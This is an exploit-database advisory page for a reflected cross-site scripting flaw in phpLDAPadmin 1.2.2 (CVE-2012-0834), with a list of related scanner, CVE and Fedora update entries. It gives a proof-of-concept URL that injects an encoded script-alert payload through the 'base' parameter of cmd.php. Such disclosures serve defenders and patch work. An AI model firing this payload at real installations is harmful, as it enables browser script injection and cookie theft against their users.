Lucene search
AndsarmientoEDB-ID:36654HistoryFeb 01, 2012 - 12:00 a.m.
phpLDAPadmin 1.2.2 - 'base' Cross-Site Scripting
2012-02-0100:00:00
andsarmiento
www.exploit-db.com
12
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/51793/info
phpLDAPadmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
phpLDAPadmin 1.2.2 is affected; other versions may also be vulnerable.
http://www.example.com/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub&
filter=objectClass%3D* display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search Related
openvas
openvas
phpLDAPadmin 'base' Parameter Cross Site Scripting Vulnerability
2012-02-02 00:00:00
phpLDAPadmin 'base' Parameter XSS Vulnerability
2012-02-02 00:00:00
Fedora Update for phpldapadmin FEDORA-2012-1253
2012-04-02 00:00:00
cve
cve
CVE-2012-0834
2012-02-11 02:55:01
nvd
nvd
CVE-2012-0834
2012-02-11 02:55:01
prion
prion
Cross site scripting
2012-02-11 02:55:00
fedora
fedora
[SECURITY] Fedora 16 Update: phpldapadmin-1.2.2-1.fc16
2012-02-14 09:02:08
[SECURITY] Fedora 15 Update: phpldapadmin-1.2.2-1.fc15
2012-02-14 08:59:35
[SECURITY] Fedora 16 Update: phpldapadmin-1.2.2-3.gitbbedf1.fc16
2012-10-06 03:49:41
nessus
nessus
Fedora 16 : phpldapadmin-1.2.2-1.fc16 (2012-1253)
2012-02-15 00:00:00
phpLDAPadmin lib/QueryRender.php base Parameter XSS
2012-02-20 00:00:00
Fedora 15 : phpldapadmin-1.2.2-1.fc15 (2012-1267)
2012-02-15 00:00:00
debiancve
debiancve
CVE-2012-0834
2012-02-11 02:55:01
ubuntucve
ubuntucve
CVE-2012-0834
2012-02-11 00:00:00
cvelist
cvelist
CVE-2012-0834
2012-02-11 02:00:00